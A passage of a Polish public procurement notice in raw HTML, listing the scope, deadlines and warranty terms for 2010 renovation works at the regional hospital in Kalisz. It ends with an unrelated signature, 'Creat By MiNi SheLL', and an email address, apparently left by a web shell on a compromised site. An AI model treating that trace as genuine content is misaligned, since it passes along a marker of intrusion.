Szczegółowy zakres robót wynika z opracowanego przedmiaru robót, dokumentacji technicznej oraz Specyfikacji Technicznej Wykonania i Odbioru Robót budowlanych - stanowiących załącznik do niniejszego wniosku.
Wykonawca dostarczy certyfikaty, atesty  na wbudowane materiały.
Roboty modernizacyjne przeprowadzone zostaną zgodnie ze sztuką budowlaną.
Termin wykonanie robót: do  7 grudnia 2010 roku.
Dopuszcza się płatność faktur częściowych, po potwierdzeniu przez inspektora nadzoru wykonania zakresu robót objętych płatnością według procentowego zaawansowania robót.
Warunki gwarancji : na wykonane roboty 36  miesięcy.
Szczegółowy zakres robót został zawarty w następujących załącznikach do Specyfikacji Istotnych Warunków Zamówieni, stanowiących integralną jej część: 

Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych 
Przedmiarze Robót 
Opis techniczny i rysunki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Modernizacja segmentu 9D dla potrzeb Oddziału Neurologii Wojewódzkiego 
Szpitala Zespolonego im. Ludwika Perzyny w Kaliszu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ROBOTY OBJĘTE PROGRAMEM DOSTOSOWAWCZYM
         1. Sale chorych:
a.wymiana stolarki drzwiowej
b.wymiana grzejników
c.wymiana wykładzin podłogowych
d.wymiana kratek wentylacyjnych na kratki aluminiowe z przepustnicą
e.wymiana desek odbojowych na ścianach i sklejki nad drzwiami
roboty malarskie

2. Łazienki przy salach chorych
a.montaż pochwytów

3.Łazienka personelu - pom. nr 24
a.wymiana płytek sciennych i podłogowych
b.wymiana grzejników
c.roboty malarskie
d.wymiana stolarki drzwiowej

4.Korytarz - pom. nr 28
a.wymiana wejściowych ścianek działowych

5.Łazienka dla pacjentów -przystosowanie dla potrzeb osób niepełnosprawnych
a.wymiana płytek ściennych i podłogowych
b.wymiana grzejników
c.roboty malarskie
d.wymiana stolarki drzwiowej
e.wymiana lamp oświetleniowych oraz osprzętu elektrycznego
f.wymiana instalacji wod. - kan. z urządzeniami
g.montaż wentylatorka mechanicznego
h.wymiana sufitów podwieszanych

6.Brudownik - pom. nr 23
a.wymiana płytek ściennych i poidłogowych na wykładziny
b.wymiana grzejników
c.roboty malarskie
d.wymiana stolarki drzwiowej
e.wymiana lamp oświetleniowych oraz osprzętu elektrycznego
f.wymiana instalacji wod. kan z urządzeniami

7.Pokoje badań i gabinet zabiegowy - pom. nr 17-19
a.wymiana grzejników
b.okładziny ścian
c.wymiana stolarki drzwiowej
d.wykonanie posadzek
e.roboty malarskie

8.Pozostałe pomieszczenia - pom. nr 1-2, 15-16, 20-21, 26, 27a
a.wymiana grzejników
b.wymiana stolarki drzwiowej
c.wymiana wykładzin podłogowych
d.roboty malarskie

ROBOTY NIE OBJĘTE PROGRAMEM DOSTOSOWAWCZYM

1.Sale chorych wraz z korytarzykami
a.wymiana podejść kanalizacyjnych oraz armatury sanitarnej (umywalek i baterii)
b.wymiana fartuszków z płytek przy umywalkach
c.wymiana sufitów podwieszanych w korytarzykach
d.malowanie łóżek i stolików przyłóżkowych
e.wymiana osprzętu elektrycznego

2.Łazienki przy salach chorych
a.wymiana instalacji wod.-kan. z urządzeniami
b.wymiana lamp oświetleniowych oraz osprzętu elektrycznego
montaż wentylatorka mechanicznego
c.wymiana sufitów podwieszanych w korytarzykach
d.wymiana płytek ściennych i podłogowych

3.Korytarz
a.wymiana instalacji oświetlenia ciągu komunikacyjnego i lamp przyzywowych
b.wymiana sufitu podwieszanego i desek odbojowych na ścianach, a także obłożenie elementów c. drewnopochodnych
d. wymiana drzwi szachtów instalacyjnych
roboty malarskie 

4.Pokoje badań i gabinet zabiegowy - pom. nr 17-19
a.roboty branży elektrycznej
b.roboty branży sanitarnej

5.Pozostałe pomieszczenia
a.roboty branży budowlanej
b.roboty branży elektrycznej
c.roboty branży sanitarnej

Roboty remontowe przeprowadzone zostaną zgodnie ze sztuką budowlaną.
Termin wykonanie robót: 7 grudnia 2010 r.
Roboty budowlane będą wykonywane na omawianym oddziale w dwóch etapach: 
I etap: remont na wyłączonej z ruchu części oddziału
II etap: po zakończeniu pierwszego etapu i przeniesieniu pacjentów na wyremontowany odcinek, wykonanie remontu na wyłączonej z ruchu pozostałej części oddziału.
Wykonawca dostarczy certyfikaty, atesty  na wbudowane materiały.

Dopuszcza się płatność faktur częściowych, po potwierdzeniu przez inspektora nadzoru wykonania zakresu robót objętych płatnością według procentowego zaawansowania robót.
Warunki gwarancji na wykonane roboty 24  miesięcy.

Szczegółowy zakres robót został zawarty w następujących załącznikach do Specyfikacji Istotnych Warunków Zamówieni, stanowiących integralną jej część: 

Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych 
Przedmiarze Robót 
Opis techniczny i rysunki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie szybu windowego i montaż windy w Budynku Zakaźnym Szpitala - realizacja 
programu dostosowawczego w obiektach przy ul. Toruńskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty Oddziale Chorób Zakaźnych dla Dorosłych i Dzieci polegają na.:
a.robotach budowlanych związanych z wykonaniem szybu windowego oraz pomieszczeń przyległych wraz z klatką schodową,
b.wykonaniu instalacji elektrycznych (zasilanie i sterowanie dźwigu, instalacja oświetleniowa i instalacja zasilania gniazd wtykowych, oprzewodowanie pod instalację ppoż. oraz instalacja oddymiania w obrębie klatki schodowej,
c.dostawa i montaż dźwigu hydraulicznego dostosowanego do łączności ze służbami ratunkowymi opartej na sieci GSM.
Roboty remontowe przeprowadzone zostaną zgodnie ze sztuką budowlaną.
Termin wykonanie robót: 7 grudnia 2010 r.
Wykonawca dostarczy certyfikaty, atesty  na wbudowane materiały.
Warunki gwarancji - wykonawca udzieli 36 miesięcznej gwarancji na wykonane roboty.
 Warunki serwisu gwarancyjnego i pogwarancyjnego:
Wykonawca zapewni bezpłatna comiesięczną konserwację i usuwanie awarii w okresie gwarancji z uwzględnieniem bezpłatnego dojazdu. Czas reakcji po zgłoszeniu awarii 
nie może być dłuższy od 0,5 godziny.
 

Szczegółowy zakres robót został zawarty w następujących załącznikach do Specyfikacji Istotnych Warunków Zamówieni, stanowiących integralną jej część: 

Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych 
Przedmiarze Robót 
Opis techniczny i rysunki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Roboty remontowe na Oddziale Urologii(seg. 8B) i Oddziale Chorób Dziecięcych (seg. 8D).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty ogólnobudowlane w branży budowlanej i elektrycznej na Oddziale Urologii (seg. 8B) 
i Oddziale Chorób Dziecięcych (segm. 8D) w budynku Wojewódzkiego Szpitala Zespolonego im. L. Perzyny w Kaliszu przy ul. Poznańskiej 79.

Zakres robót obejmuje:
Oddział Urologii (kond. 8B):
1.	Demontaż listwowego sufitu podwieszanego
2.	Wykonanie konstrukcji rusztów pod sufity podwieszane modułowe
3.	Montaż modułów stropu podwieszonego f-my Armstrong lub równoważnych
4.	Wywiezienie elementów rozebranego sufitu wraz z kosztami składowania
5.	Obłożenie elementów drewnopochodnych (płyt) przy drzwiach wejściowych z korytarza płytami z ACROVIN gr. 2 mm
6.	Wymiana stolarki drewnianej na drzwi aluminiowe jednoskrzydłowe o szer. skrzydła 80 cm z szybka do zbicia w razie pożaru
7.	Wymiana drzwiczek rewizyjnych drewnianych i innych na gotowe malowane proszkowo
8.	Wymiana instalacji oświetlenia ciągu komunikacyjnego i lampek przyzywowych
a.demontaż opraw oświetleniowych świetlówkowych
b.demontaż opraw oswietleniowych żarowych oświetlenie awaryjne i nocne
c.demontaż sygnalizatora optycznego wewnętrznego
d.wymiana przewodów i puszek
e.montaż opraw oświetleniowych świetlówkowych w sufitach podwieszanych
f.montaż opraw oświetleniowych żarowych, halogenowych w sufitach podwieszanych (oświetlenie awaryjne i nocne)
g.przygotowanie podłoża pod osprzęt instalacyjny
h.montaż puszek instalacyjnych i do osprzętu
i.montaż sygnalizatora optycznego wewnętrznego
j.dokonanie przełączeń w puszkach systemu przywoławczego
k.sprawdzenie i uruchomienie linii sygnalizacji przyzywowych
l.sprawdzenie i pomiar 1-fazowego obwodu elektrycznego niskiego napięcia.

Oddział Chorób Dziecięcych (kond. 8 D)

1.	Demontaż listwowego sufitu podwieszanego
2.	Wykonanie konstrukcji rusztów pod sufity podwieszane modułowe
3.	Montaż modułów stropu podwieszonego f-my Armstrong lub równoważnych
4.	Wywiezienie elementów rozebranego sufitu wraz z kosztami składowania
5.	Obłożenie elementów drewnopochodnych (płyt) przy drzwiach wejściowych z korytarza płytami z ACROVIN gr. 2 mm
6.	Wymiana stolarki drewnianej na drzwi aluminiowe jednoskrzydłowe o szer. skrzydła 80 cm z szybka do zbicia w razie pożaru
7.	Wymiana drzwiczek rewizyjnych drewnianych i innych na gotowe malowane proszkowo
8.	Wymiana instalacji oświetlenia ciągu komunikacyjnego i lampek przyzywowych
a.demontaż opraw oświetleniowych świetlówkowych
b.demontaż opraw oswietleniowych żarowych oświetlenie awaryjne i nocne
c.demontaż sygnalizatora optycznego wewnętrznego
d.wymiana przewodów i puszek
e.montaż opraw oświetleniowych świetlówkowych w sufitach podwieszanych
f.montaż opraw oświetleniowych żarowych, halogenowych w sufitach podwieszanych (oświetlenie awaryjne i nocne)
g.przygotowanie podłoża pod osprzęt instalacyjny
h.montaż puszek instalacyjnych i do osprzętu
i.montaż sygnalizatora optycznego wewnętrznego
j.dokonanie przełączeń w puszkach systemu przywoławczego
k.sprawdzenie i uruchomienie linii sygnalizacji przyzywowych
l.sprawdzenie i pomiar 1-fazowego obwodu elektrycznego niskiego napięcia.

Roboty remontowe przeprowadzone zostaną zgodnie ze sztuką budowlaną.
Termin wykonanie robót: 30 października 2010 r.

Wykonawca dostarczy certyfikaty, atesty  na wbudowane materiały.

Warunki gwarancji : na wykonane roboty 24  miesięcy.

Szczegółowy zakres robót został zawarty w Przedmiarze Robót.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com